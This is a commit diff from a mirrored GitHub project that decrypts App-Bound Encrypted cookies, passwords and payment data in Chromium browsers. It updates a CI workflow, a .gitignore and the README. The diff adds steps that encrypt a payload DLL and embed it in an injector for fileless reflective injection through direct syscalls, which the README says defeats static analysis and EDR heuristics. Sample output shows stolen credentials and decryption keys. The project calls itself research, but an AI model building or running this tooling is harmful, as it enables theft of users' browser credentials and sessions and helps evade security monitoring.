mirror of
https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption
synced 2026-06-08 18:24:00 +00:00
v0.12.0
This commit is contained in:
@@ -18,59 +18,65 @@ jobs:
|
||||
include:
|
||||
- architecture: x64
|
||||
platform_toolset_arg: x64
|
||||
output_suffix: x64 #
|
||||
final_injector_name: chrome_inject_x64.exe
|
||||
- architecture: arm64
|
||||
platform_toolset_arg: x64_arm64
|
||||
output_suffix: arm64
|
||||
final_injector_name: chrome_inject_arm64.exe
|
||||
|
||||
steps:
|
||||
- name: Checkout repository
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Add MSVC to PATH and set up environment variables
|
||||
- name: Add MSVC to PATH
|
||||
uses: ilammy/msvc-dev-cmd@v1
|
||||
with:
|
||||
arch: ${{ matrix.platform_toolset_arg }}
|
||||
|
||||
- name: Compile SQLite (${{ matrix.architecture }})
|
||||
- name: 1. Create Build Directory
|
||||
run: mkdir build
|
||||
|
||||
- name: 2. Compile SQLite Library
|
||||
shell: cmd
|
||||
run: |
|
||||
echo "Compiling SQLite for ${{ matrix.architecture }}"
|
||||
cl /nologo /W3 /O2 /MT /c libs\sqlite\sqlite3.c /Fo"sqlite3_${{ matrix.output_suffix }}.obj"
|
||||
lib /nologo /OUT:"sqlite3_${{ matrix.output_suffix }}.lib" "sqlite3_${{ matrix.output_suffix }}.obj"
|
||||
echo "SQLite compilation finished for ${{ matrix.architecture }}"
|
||||
cl /nologo /W3 /O2 /MT /GS- /c libs\sqlite\sqlite3.c /Fo"build\sqlite3.obj"
|
||||
lib /nologo /OUT:"build\sqlite3.lib" "build\sqlite3.obj"
|
||||
|
||||
- name: Compile chrome_decrypt.dll (${{ matrix.architecture }})
|
||||
- name: 3. Compile Payload DLL (Intermediate)
|
||||
shell: cmd
|
||||
run: |
|
||||
echo "Compiling chrome_decrypt.dll for ${{ matrix.architecture }}"
|
||||
cl /EHsc /std:c++17 /LD /O2 /MT /Ilibs\sqlite src\chrome_decrypt.cpp src\reflective_loader.c "sqlite3_${{ matrix.output_suffix }}.lib" bcrypt.lib ole32.lib oleaut32.lib shell32.lib version.lib comsuppw.lib /link /OUT:"chrome_decrypt.dll"
|
||||
echo "chrome_decrypt.dll compilation finished for ${{ matrix.architecture }}"
|
||||
echo "Compiling C object..."
|
||||
cl /nologo /W3 /O2 /MT /GS- /c src\reflective_loader.c /Fo"build\reflective_loader.obj"
|
||||
echo "Compiling C++ object..."
|
||||
cl /nologo /W3 /O2 /MT /GS- /EHsc /std:c++17 /Ilibs\sqlite /c src\chrome_decrypt.cpp /Fo"build\chrome_decrypt.obj"
|
||||
echo "Linking DLL..."
|
||||
link /NOLOGO /DLL /OUT:"build\chrome_decrypt.dll" "build\chrome_decrypt.obj" "build\reflective_loader.obj" "build\sqlite3.lib" bcrypt.lib ole32.lib oleaut32.lib shell32.lib version.lib comsuppw.lib /IMPLIB:"build\chrome_decrypt.lib"
|
||||
|
||||
- name: Compile chrome_inject.exe (${{ matrix.architecture }})
|
||||
- name: 4. Compile Encryption Utility
|
||||
shell: cmd
|
||||
run: |
|
||||
echo "Compiling chrome_inject.exe for ${{ matrix.architecture }}"
|
||||
cl /EHsc /O2 /std:c++17 /MT src\chrome_inject.cpp src\syscalls.cpp version.lib shell32.lib /link /OUT:"${{ matrix.final_injector_name }}"
|
||||
echo "chrome_inject.exe compilation finished for ${{ matrix.architecture }}"
|
||||
|
||||
- name: Create Artifacts Directory
|
||||
run: mkdir staging
|
||||
|
||||
- name: Move artifacts to staging
|
||||
cl /nologo /W3 /O2 /MT /GS- /EHsc /std:c++17 /Ilibs\chacha src\encryptor.cpp /Fo"build\encryptor.obj" /link /NOLOGO /DYNAMICBASE /NXCOMPAT /OUT:"build\encryptor.exe"
|
||||
|
||||
- name: 5. Encrypt Payload
|
||||
shell: cmd
|
||||
run: |
|
||||
move "chrome_decrypt.dll" staging\
|
||||
move "${{ matrix.final_injector_name }}" staging\
|
||||
echo "Moved artifacts to staging for ${{ matrix.architecture }}"
|
||||
build\encryptor.exe build\chrome_decrypt.dll build\chrome_decrypt.enc
|
||||
|
||||
- name: Upload build artifacts (${{ matrix.architecture }})
|
||||
- name: 6. Compile Resource File
|
||||
shell: cmd
|
||||
run: |
|
||||
rem This step requires that src/resource.rc has been modified to use "chrome_decrypt.enc" instead of a relative path.
|
||||
rc.exe /i "build" /fo "build\resource.res" src\resource.rc
|
||||
|
||||
- name: 7. Compile Final Injector Executable
|
||||
shell: cmd
|
||||
run: |
|
||||
cl /nologo /W3 /O2 /MT /GS- /EHsc /std:c++17 /Ilibs\chacha src\chrome_inject.cpp src\syscalls.cpp /Fo"build\\" "build\resource.res" version.lib shell32.lib /link /NOLOGO /DYNAMICBASE /NXCOMPAT /OUT:"${{ matrix.final_injector_name }}"
|
||||
|
||||
- name: 8. Upload Final Executable Artifact
|
||||
uses: actions/upload-artifact@v4
|
||||
with:
|
||||
name: chrome-decryptor-binaries-${{ matrix.architecture }}
|
||||
path: staging/
|
||||
name: injector-bin-${{ matrix.architecture }}
|
||||
path: ${{ matrix.final_injector_name }}
|
||||
|
||||
create_release:
|
||||
name: Create GitHub Release
|
||||
@@ -78,84 +84,49 @@ jobs:
|
||||
needs: build
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
outputs:
|
||||
release_url: ${{ steps.create_release.outputs.html_url }}
|
||||
|
||||
steps:
|
||||
- name: Checkout repository
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Download x64 binaries
|
||||
- name: Download all injector binaries
|
||||
uses: actions/download-artifact@v4
|
||||
with:
|
||||
name: chrome-decryptor-binaries-x64
|
||||
path: release_assets/x64
|
||||
path: release_assets
|
||||
pattern: injector-bin-*
|
||||
merge-multiple: true
|
||||
|
||||
- name: Download ARM64 binaries
|
||||
uses: actions/download-artifact@v4
|
||||
with:
|
||||
name: chrome-decryptor-binaries-arm64
|
||||
path: release_assets/arm64
|
||||
|
||||
- name: List downloaded files
|
||||
- name: List downloaded files for verification
|
||||
run: |
|
||||
echo "--- Listing contents of release_assets ---"
|
||||
ls -R release_assets
|
||||
echo "------------------------------------------"
|
||||
|
||||
- name: Create ZIP archives
|
||||
id: zip_packages
|
||||
- name: Create Consolidated ZIP Archive
|
||||
id: zip_package
|
||||
shell: bash
|
||||
run: |
|
||||
VERSION_TAG=${{ github.ref_name }}
|
||||
VERSION_NUM=${VERSION_TAG#v}
|
||||
ZIP_NAME="chrome-injector-${VERSION_TAG}.zip"
|
||||
|
||||
mkdir -p release_packages
|
||||
echo "Zipping assets to ${ZIP_NAME}..."
|
||||
(cd release_assets && zip "../${ZIP_NAME}" *)
|
||||
|
||||
X64_ZIP_NAME="chrome-decryptor-${VERSION_NUM}-x64.zip"
|
||||
ARM64_ZIP_NAME="chrome-decryptor-${VERSION_NUM}-arm64.zip"
|
||||
|
||||
echo "Zipping x64 assets to release_packages/${X64_ZIP_NAME}..."
|
||||
if [ -z "$(ls -A release_assets/x64)" ]; then
|
||||
echo "Error: x64 release_assets directory is empty or files not found!"
|
||||
ls -l release_assets/
|
||||
exit 1
|
||||
fi
|
||||
# Zip contents of release_assets/x64: chrome_inject_x64.exe and chrome_decrypt.dll
|
||||
(cd release_assets/x64 && zip "../../release_packages/${X64_ZIP_NAME}" chrome_inject_x64.exe chrome_decrypt.dll)
|
||||
|
||||
echo "Zipping arm64 assets to release_packages/${ARM64_ZIP_NAME}..."
|
||||
if [ -z "$(ls -A release_assets/arm64)" ]; then
|
||||
echo "Error: arm64 release_assets directory is empty or files not found!"
|
||||
ls -l release_assets/
|
||||
exit 1
|
||||
fi
|
||||
# Zip contents of release_assets/arm64: chrome_inject_arm64.exe and chrome_decrypt.dll
|
||||
(cd release_assets/arm64 && zip "../../release_packages/${ARM64_ZIP_NAME}" chrome_inject_arm64.exe chrome_decrypt.dll)
|
||||
|
||||
echo "Created ZIP packages:"
|
||||
ls -l release_packages
|
||||
echo "Created ZIP package:"
|
||||
ls -l "${ZIP_NAME}"
|
||||
|
||||
echo "x64_zip_path=release_packages/${X64_ZIP_NAME}" >> $GITHUB_OUTPUT
|
||||
echo "arm64_zip_path=release_packages/${ARM64_ZIP_NAME}" >> $GITHUB_OUTPUT
|
||||
echo "zip_path=${ZIP_NAME}" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Create Release
|
||||
id: create_release
|
||||
uses: softprops/action-gh-release@v2
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
tag_name: ${{ github.ref_name }}
|
||||
name: Release ${{ github.ref_name }}
|
||||
body: |
|
||||
Automated release for version ${{ github.ref_name }}.
|
||||
Contains x64 and ARM64 binaries.
|
||||
Each ZIP includes:
|
||||
- chrome_inject_ARCH.exe (e.g., chrome_inject_x64.exe)
|
||||
- chrome_decrypt.dll (architecture-specific)
|
||||
Automated release for version **${{ github.ref_name }}**.
|
||||
|
||||
The attached `.zip` file contains the final injector executable for all supported architectures.
|
||||
|
||||
**Contents:**
|
||||
- `chrome_inject_x64.exe`
|
||||
- `chrome_inject_arm64.exe`
|
||||
draft: false
|
||||
prerelease: false
|
||||
files: |
|
||||
${{ steps.zip_packages.outputs.x64_zip_path }}
|
||||
${{ steps.zip_packages.outputs.arm64_zip_path }}
|
||||
fail_on_unmatched_files: true
|
||||
files: ${{ steps.zip_package.outputs.zip_path }}
|
||||
fail_on_unmatched_files: true
|
||||
+3
-1
@@ -23,4 +23,6 @@ libs/sqlite/*.lib
|
||||
/chrome_decrypt_session.cfg
|
||||
/*_decrypt_cookies.txt
|
||||
/*_decrypt_passwords.txt
|
||||
/*_decrypt_payments.txt
|
||||
/*_decrypt_payments.txt
|
||||
/.vscode
|
||||
/build
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
## 🚀 Overview
|
||||
|
||||
Fully decrypt **App-Bound Encrypted (ABE)** cookies, passwords & payment methods from Chromium-based browsers (Chrome, Brave, Edge) — all in user mode, no admin rights required.
|
||||
A proof-of-concept tool to decrypt **App-Bound Encrypted (ABE)** cookies, passwords, and payment methods from Chromium-based browsers (Chrome, Brave, Edge). This is achieved entirely in user-mode with no administrator rights required.
|
||||
|
||||
If you find this useful, I’d appreciate a coffee:
|
||||
[](https://ko-fi.com/M4M61EP5XL)
|
||||
@@ -17,19 +17,18 @@ Starting in **Chrome 127+**, Google began rolling out **App-Bound Encryption** t
|
||||
|
||||
These path-validation checks prevent any external tool — even with direct DPAPI access — from unwrapping the ABE key.
|
||||
|
||||
## 💡 Project Philosophy & Disclaimer
|
||||
|
||||
> [!IMPORTANT]
|
||||
> This is a hobby project created for educational and security research purposes. It serves as a personal learning experience and a playing field for exploring advanced Windows concepts.
|
||||
>
|
||||
> **This tool is NOT intended to be a fully-featured infostealer or a guaranteed EDR evasion tool.** While it employs advanced techniques, its primary goal is to demonstrate and dissect the ABE mechanism, not to provide operational stealth for malicious use. Please ensure compliance with all relevant legal and ethical guidelines.
|
||||
|
||||
## 🛠️ How It Works
|
||||
|
||||
**This project** injects a DLL into the running browser process using **Reflective DLL Injection (RDI)**. The RDI technique for x64 is based on [Stephen Fewer's original work](https://github.com/stephenfewer/ReflectiveDLLInjection), and for ARM64, it utilizes my method detailed in [ARM64-ReflectiveDLLInjection](https://github.com/xaitax/ARM64-ReflectiveDLLInjection). Once injected, the DLL:
|
||||
|
||||
1. **Stealthy Injector (`chrome_inject.exe`):** Employs an advanced, multi-architecture **direct syscall** engine to execute a fileless, in-memory injection of the payload. This method avoids high-level WinAPI calls, minimizing its signature for EDR products.
|
||||
2. **Reflective Payload (`chrome_decrypt.dll`):** Once in the target's address space, it uses **Reflective DLL Injection (RDI)** to properly load itself into memory. It then invokes the `IElevator` COM interface to unwrap the ABE key and decrypt all sensitive data in user land, no elevation needed.
|
||||
1. **Injector (`chrome_inject.exe`):**
|
||||
* The payload DLL is not stored on disk. Instead, it is **encrypted with ChaCha20** and embedded directly into the injector's executable as a resource during compilation.
|
||||
* At runtime, the injector loads this encrypted resource into memory, decrypts it, and uses a **direct syscall engine** to perform a Reflective DLL Injection (RDI) of the payload into the target browser process.
|
||||
* This in-memory, fileless approach completely avoids on-disk artifacts for the payload, defeating static analysis and common EDR heuristics.
|
||||
2. **Injected Payload (In-Memory):**
|
||||
* Once running in the browser's address space, the payload uses its privileged position to invoke the browser's internal IElevator COM server.
|
||||
* Because the request originates from within the trusted process, the COM server successfully decrypts the App-Bound master key.
|
||||
* The payload then uses this key to decrypt all sensitive data (cookies, passwords, payments) across all user profiles and streams the results back to the injector.
|
||||
|
||||
## 🔬 In-Depth Technical Analysis & Research
|
||||
|
||||
@@ -63,12 +62,13 @@ For a comprehensive understanding of Chrome's App-Bound Encryption, the intricac
|
||||
|
||||
### ⚙️ Key Features
|
||||
|
||||
- 🔓 Full user-mode decryption & JSON export of cookies, passwords & payment methods
|
||||
- 📁 Customizable output directory for extracted data (`.\output\` by default)
|
||||
- 👥 Support for multiple browser profiles (Default, Profile 1, Profile 2, etc.)
|
||||
- 🛡️ Advanced direct syscall injection engine to bypass common endpoint defenses
|
||||
- 🔓 Full user-mode decryption & JSON export of cookies, passwords & payment methods.
|
||||
- 🛡️ Fileless Payload Delivery: In-memory decryption and injection of an encrypted resource, leaving no DLL on disk.
|
||||
- 🛡️ Direct syscall injection engine to bypass common endpoint defenses.
|
||||
- 🌐 Works on **Google Chrome**, **Brave** & **Edge** (x64 & ARM64)
|
||||
- 🛠️ No admin privileges required
|
||||
- 👥 Support for multiple browser profiles (Default, Profile 1, Profile 2, etc.)
|
||||
- 📁 Customizable output directory for extracted data.
|
||||
- 🛠️ No admin privileges required.
|
||||
|
||||

|
||||
|
||||
@@ -77,49 +77,80 @@ For a comprehensive understanding of Chrome's App-Bound Encryption, the intricac
|
||||
|
||||
| Browser | Tested Version (x64 & ARM64) |
|
||||
| ------------------ | ---------------------------- |
|
||||
| **Google Chrome** | 137.0.7151.104 |
|
||||
| **Brave** | 1.79.123 (137.0.7151.104) |
|
||||
| **Microsoft Edge** | 138.0.3351.21 |
|
||||
| **Google Chrome** | 138.0.7204.50 |
|
||||
| **Brave** | 1.79.126 (137.0.7151.119) |
|
||||
| **Microsoft Edge** | 138.0.3351.42 |
|
||||
|
||||
> [!NOTE]
|
||||
> The injector requires the target browser to be **running** unless you use `--start-browser`.
|
||||
|
||||
## 🔧 Build Instructions
|
||||
|
||||
1. **Clone** the repository and open a _Developer Command Prompt for VS_ (or any MSVC‑enabled shell).
|
||||
This project uses a simple, robust build script that handles all compilation and resource embedding automatically.
|
||||
|
||||
2. **Prepare SQLite Amalgamation**
|
||||
1. **Clone** this repository.
|
||||
|
||||
1. The [SQLite “autoconf” amalgamation](https://www.sqlite.org/download.html) source files (`sqlite3.c`, `sqlite3.h`) are included in the `libs/sqlite/` directory.
|
||||
2. Open a **Developer Command Prompt for VS** (or any MSVC‑enabled shell).
|
||||
|
||||
2. In a **Developer Command Prompt for VS** (ensure you're in the project root):
|
||||
3. Run the build script from the project root:
|
||||
|
||||
```bash
|
||||
cl /nologo /W3 /O2 /MT /c libs\sqlite\sqlite3.c /Folibs\sqlite\sqlite3.obj
|
||||
lib /nologo /OUT:libs\sqlite\sqlite3.lib libs\sqlite\sqlite3.obj
|
||||
PS> make.bat
|
||||
--------------------------------------------------
|
||||
| Chrome Injector Build Script |
|
||||
--------------------------------------------------
|
||||
|
||||
[INFO] Verifying build environment...
|
||||
[ OK ] Developer environment detected.
|
||||
[INFO] Target Architecture: arm64
|
||||
|
||||
[INFO] Performing pre-build setup...
|
||||
[INFO] - Creating fresh build directory: build
|
||||
[ OK ] Setup complete.
|
||||
|
||||
-- [1/6] Compiling SQLite3 Library ------------------------------------------------
|
||||
[INFO] - Compiling C object file...
|
||||
[INFO] - Creating static library...
|
||||
[ OK ] SQLite3 library built successfully.
|
||||
|
||||
-- [2/6] Compiling Payload DLL (chrome_decrypt.dll) ------------------------------------------------
|
||||
[INFO] - Compiling C file (reflective_loader.c)...
|
||||
[INFO] - Compiling C++ file (chrome_decrypt.cpp)...
|
||||
[INFO] - Linking objects into DLL...
|
||||
[ OK ] Payload DLL compiled successfully.
|
||||
|
||||
-- [3/6] Compiling Encryption Utility (encryptor.exe) ------------------------------------------------
|
||||
[INFO] - Compiling and linking...
|
||||
[ OK ] Encryptor utility compiled successfully.
|
||||
|
||||
-- [4/6] Encrypting Payload DLL ------------------------------------------------
|
||||
[INFO] - Running encryption process...
|
||||
[ OK ] Payload encrypted to chrome_decrypt.enc.
|
||||
|
||||
-- [5/6] Compiling Resource File ------------------------------------------------
|
||||
[INFO] - Compiling .rc to .res...
|
||||
[ OK ] Resource file compiled successfully.
|
||||
|
||||
-- [6/6] Compiling Final Injector (chrome_inject.exe) ------------------------------------------------
|
||||
[INFO] - Compiling and linking...
|
||||
[ OK ] Final injector built successfully.
|
||||
|
||||
--------------------------------------------------
|
||||
| BUILD SUCCESSFUL |
|
||||
--------------------------------------------------
|
||||
|
||||
Final Executable: .\chrome_inject.exe
|
||||
|
||||
[INFO] Build successful. Final artifacts are ready.
|
||||
```
|
||||
|
||||
This produces `libs\sqlite\sqlite3.lib` which will be linked into the DLL.
|
||||
|
||||
3. **Compile the DLL** (responsible for the decryption logic):
|
||||
|
||||
```bash
|
||||
cl /EHsc /std:c++17 /LD /O2 /MT /Ilibs\sqlite src\chrome_decrypt.cpp src\reflective_loader.c libs\sqlite\sqlite3.lib bcrypt.lib ole32.lib oleaut32.lib shell32.lib version.lib comsuppw.lib /link /OUT:chrome_decrypt.dll
|
||||
```
|
||||
|
||||
4. **Compile the injector** (responsible for DLL injection & console UX):
|
||||
|
||||
```bash
|
||||
cl /EHsc /O2 /std:c++17 /MT src\chrome_inject.cpp src\syscalls.cpp version.lib shell32.lib /link /OUT:chrome_inject.exe
|
||||
```
|
||||
|
||||
Both artifacts (`chrome_inject.exe`, `chrome_decrypt.dll`) must reside in the same folder.
|
||||
This single command will compile all components and produce a self-contained `chrome_inject.exe` in the root directory.
|
||||
|
||||
### Automated Builds with GitHub Actions
|
||||
|
||||
This project uses GitHub Actions to automatically build `chrome_inject.exe` and `chrome_decrypt.dll` for both **x64** and **ARM64** architectures.
|
||||
This project uses GitHub Actions to automatically build a single, self-contained `chrome_inject.exe` for both **x64** and **ARM64** architectures.
|
||||
|
||||
You can find the latest pre-compiled binaries attached to the [**Releases page**](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/releases) of this repository.
|
||||
You can find the latest pre-compiled binaries packaged in a single .zip file on the [**Releases page**](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/releases).
|
||||
|
||||
## 🚀 Usage
|
||||
|
||||
@@ -163,32 +194,28 @@ PS> .\chrome_inject.exe --start-browser chrome
|
||||
| Chrome App-Bound Encryption Decryption |
|
||||
| Direct Syscall Injection Engine |
|
||||
| x64 & ARM64 | Cookies, Passwords, Payments |
|
||||
| v0.11.0 by @xaitax |
|
||||
| v0.12.0 by @xaitax |
|
||||
------------------------------------------------
|
||||
|
||||
[*] Chrome not running, launching...
|
||||
[+] Chrome (v. 138.0.7204.50) launched w/ PID 23372
|
||||
[+] DLL injected via Reflective DLL Injection (RDI with Syscalls)
|
||||
[*] Waiting for DLL (Pipe: \\.\pipe\ChromeDecryptIPC_9c71c588-e69d-4b59-ba30-1d6303c2eaba
|
||||
[*] Waiting for DLL (Pipe: \\.\pipe\ChromeDecryptIPC_a98ad5d7-dcb6-4db2-a744-05c418297baa)
|
||||
|
||||
[*] Decryption process started for Chrome
|
||||
[+] COM library initialized (APARTMENTTHREADED).
|
||||
[+] Attempting to read Local State file: C:\Users\ah\AppData\Local\Google\Chrome\User Data\Local State
|
||||
[+] Encrypted key header is valid.
|
||||
[+] Encrypted key blob from Local State (1220 bytes).
|
||||
[+] Encrypted key (preview): 01000000d08c9ddf0115d1118c7a00c0...
|
||||
[+] IElevator instance created for Chrome.
|
||||
[+] Proxy blanket set (PKT_PRIVACY, IMPERSONATE, DYNAMIC_CLOAKING) for Chrome.
|
||||
[+] IElevator -> DecryptData successful. Decrypted key length: 32
|
||||
[+] Decrypted AES key (hex) saved to: C:\Users\ah\AppData\Local\Temp\chrome_appbound_key.txt
|
||||
[+] Decrypted AES Key (hex): 97fd6072e90096a6f00dc4cb7d9d6d2a7368122614a99e1cc5aa980fbdba886b
|
||||
[*] Found profile: Default
|
||||
[*] Found profile: Profile 1
|
||||
[*] Processing profile: Default at path: C:\Users\ah\AppData\Local\Google\Chrome\User Data\Default
|
||||
[*] 9 Cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\cookies.txt
|
||||
[*] 1 Passwords extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\passwords.txt
|
||||
[*] 1 Payment methods extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\payments.txt
|
||||
[*] Processing profile: Profile 1 at path: C:\Users\ah\AppData\Local\Google\Chrome\User Data\Profile 1
|
||||
[*] 136 Cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Profile 1\cookies.txt
|
||||
[*] Chrome data decryption process finished for Chrome.
|
||||
[+] Reading Local State file: C:\Users\ah\AppData\Local\Google\Chrome\User Data\Local State
|
||||
[+] Decrypted AES Key: 97fd6072e90096a6f00dc4cb7d9d6d2a7368122614a99e1cc5aa980fbdba886b
|
||||
[*] Processing profile: Default
|
||||
[*] 9 cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\cookies.txt
|
||||
[*] 1 passwords extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\passwords.txt
|
||||
[*] 1 payments extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\payments.txt
|
||||
[*] Processing profile: Profile 1
|
||||
[*] 136 cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Profile 1\cookies.txt
|
||||
[*] Decryption process finished.
|
||||
|
||||
[+] DLL signaled completion or pipe interaction ended.
|
||||
[*] Chrome terminated by injector.
|
||||
```
|
||||
|
||||
#### Verbose
|
||||
@@ -199,79 +226,44 @@ PS> .\chrome_inject.exe --verbose --start-browser chrome
|
||||
| Chrome App-Bound Encryption Decryption |
|
||||
| Direct Syscall Injection Engine |
|
||||
| x64 & ARM64 | Cookies, Passwords, Payments |
|
||||
| v0.11.0 by @xaitax |
|
||||
| v0.12.0 by @xaitax |
|
||||
------------------------------------------------
|
||||
|
||||
[#] [Syscalls] Found and sorted 489 Zw* functions.
|
||||
[#] [Syscalls] Successfully initialized all syscall stubs via Tartarus Gate.
|
||||
[#] [Syscalls] - NtAllocateVirtualMemory found at 140734625681808
|
||||
[#] Verbose mode enabled.
|
||||
[#] Auto-start browser enabled.
|
||||
[#] Browser type argument: chrome
|
||||
[#] CleanupPreviousRun: attempting to remove temp files
|
||||
[#] Deleting C:\Users\ah\AppData\Local\Temp\chrome_appbound_key.txt
|
||||
[#] Resolved output path: C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output
|
||||
[#] Target: Chrome, Process: chrome.exe, Default Exe: C:\Program Files\Google\Chrome\Application\chrome.exe
|
||||
[#] GetProcessIdByName: snapshotting processes for chrome.exe
|
||||
[#] HandleGuard: acquired handle 0xdc (CreateToolhelp32Snapshot)
|
||||
[#] Found process chrome.exe PID=8720
|
||||
[#] HandleGuard: closing handle 0xdc (CreateToolhelp32Snapshot)
|
||||
[#] Opening process PID=8720
|
||||
[#] HandleGuard: acquired handle 0xdc (TargetProcessHandle)
|
||||
[#] IsWow64Process2: processMachine=Unknown, nativeMachine=ARM64, effectiveArch=ARM64
|
||||
[#] IsWow64Process2: processMachine=Unknown, nativeMachine=ARM64, effectiveArch=ARM64
|
||||
[#] [Syscalls] - NtAllocateVirtualMemory found at 140726530544016
|
||||
[#] Named pipe server created: \\.\pipe\ChromeDecryptIPC_1a7002a9-b8fd-4788-8e21-1a3c95f8cf41
|
||||
[#] Snapshotting processes for msedge.exe
|
||||
[#] Found process msedge.exe PID=16772
|
||||
[#] Architecture match: Injector=ARM64, Target=ARM64
|
||||
[#] Memory for pipe name allocated in target at 0x1d7825f0000
|
||||
[#] Pipe name written to target memory.
|
||||
[#] GetPayloadDllPathUtf8: DLL path determined as: C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\chrome_decrypt.dll
|
||||
[#] InjectWithReflectiveLoader: begin for DLL: C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\chrome_decrypt.dll, Param: 0x1d7825f0000
|
||||
[#] RDI: DLL read into local buffer. Size: 1400320 bytes.
|
||||
[#] RDI: ReflectiveLoader file offset: 0x18b90
|
||||
[#] RDI: Memory allocated in target at 0x1d782e50000 (Size: 1400320 bytes)
|
||||
[#] RDI: DLL written to target memory.
|
||||
[#] RDI: Calculated remote ReflectiveLoader address: 0x1d782e68b90
|
||||
[#] HandleGuard: reset to handle 0xe0
|
||||
[#] RDI: Waiting for remote ReflectiveLoader thread to complete (max 15s)...
|
||||
[#] RDI: Remote thread exit code: 0x82fb0000
|
||||
[#] RDI: Remote ReflectiveLoader thread finished.
|
||||
[#] InjectWithReflectiveLoader: done
|
||||
[#] HandleGuard: closing handle 0xe0 (RemoteReflectiveLoaderThread_Syscall)
|
||||
[#] Loading payload DLL from embedded resource.
|
||||
[#] Successfully loaded embedded resource 'PAYLOAD_DLL'. Size: 1364992 bytes.
|
||||
[#] Decrypting payload in-memory with ChaCha20...
|
||||
[#] Payload decrypted.
|
||||
[#] RDI: ReflectiveLoader file offset: 0x138d0
|
||||
[#] RDI: Memory allocated in target at 0x28a070f0000
|
||||
[#] RDI: Calculated remote ReflectiveLoader address: 0x28a071038d0
|
||||
[#] RDI: Waiting for remote ReflectiveLoader thread...
|
||||
[+] DLL injected via Reflective DLL Injection (RDI with Syscalls)
|
||||
[#] Waiting for DLL to connect to named pipe: \\.\pipe\ChromeDecryptIPC_6f6a66c2-6712-49ad-9c98-d3701e8f2d61
|
||||
[#] Waiting for DLL to connect to named pipe...
|
||||
[#] DLL connected to named pipe.
|
||||
[#] Verbose status (VERBOSE_TRUE) sent to DLL.
|
||||
[#] Output path sent to DLL: C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output
|
||||
[*] Waiting for DLL (Pipe: \\.\pipe\ChromeDecryptIPC_6f6a66c2-6712-49ad-9c98-d3701e8f2d61
|
||||
[#] Sent message to pipe: VERBOSE_TRUE
|
||||
[#] Sent message to pipe: C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output
|
||||
[*] Waiting for DLL (Pipe: \\.\pipe\ChromeDecryptIPC_1a7002a9-b8fd-4788-8e21-1a3c95f8cf41)
|
||||
|
||||
[+] Terminated process: ID 19772 (chrome.exe)
|
||||
[+] Terminated process: ID 4048 (chrome.exe)
|
||||
[+] Terminated process: ID 12188 (chrome.exe)
|
||||
[*] Decryption process started for Edge
|
||||
[+] COM library initialized (APARTMENTTHREADED).
|
||||
[+] Attempting to read Local State file: C:\Users\ah\AppData\Local\Google\Chrome\User Data\Local State
|
||||
[+] Encrypted key header is valid.
|
||||
[+] Encrypted key blob from Local State (1220 bytes).
|
||||
[+] Encrypted key (preview): 01000000d08c9ddf0115d1118c7a00c0...
|
||||
[+] IElevator instance created for Chrome.
|
||||
[+] Proxy blanket set (PKT_PRIVACY, IMPERSONATE, DYNAMIC_CLOAKING) for Chrome.
|
||||
[+] IElevator -> DecryptData successful. Decrypted key length: 32
|
||||
[+] Decrypted AES key (hex) saved to: C:\Users\ah\AppData\Local\Temp\chrome_appbound_key.txt
|
||||
[+] Decrypted AES Key (hex): 97fd6072e90096a6f00dc4cb7d9d6d2a7368122614a99e1cc5aa980fbdba886b
|
||||
[*] Found profile: Default
|
||||
[*] Found profile: Profile 1
|
||||
[*] Processing profile: Default at path: C:\Users\ah\AppData\Local\Google\Chrome\User Data\Default
|
||||
[*] 9 Cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\cookies.txt
|
||||
[*] 1 Passwords extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\passwords.txt
|
||||
[*] 1 Payment methods extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Default\payments.txt
|
||||
[*] Processing profile: Profile 1 at path: C:\Users\ah\AppData\Local\Google\Chrome\User Data\Profile 1
|
||||
[*] 136 Cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Chrome\Profile 1\cookies.txt
|
||||
[*] Chrome data decryption process finished for Chrome.
|
||||
[#] DLL completion signal received via pipe.
|
||||
[+] Reading Local State file: C:\Users\ah\AppData\Local\Microsoft\Edge\User Data\Local State
|
||||
[+] Decrypted AES Key: b0334fad7f5805362cb4c44b144a95ab7a68f7346ef99eb3f175f09db08c8fd9
|
||||
[*] Processing profile: Default
|
||||
[*] 156 cookies extracted to C:\Users\ah\Documents\GitHub\Chrome-App-Bound-Encryption-Decryption\output\Edge\Default\cookies.txt
|
||||
[*] Decryption process finished.
|
||||
[#] DLL completion signal received.
|
||||
|
||||
[+] DLL signaled completion or pipe interaction ended.
|
||||
[#] Freed pipe name memory in target process.
|
||||
[#] Browser was already running; injector will not terminate it.
|
||||
[#] Injector finished.
|
||||
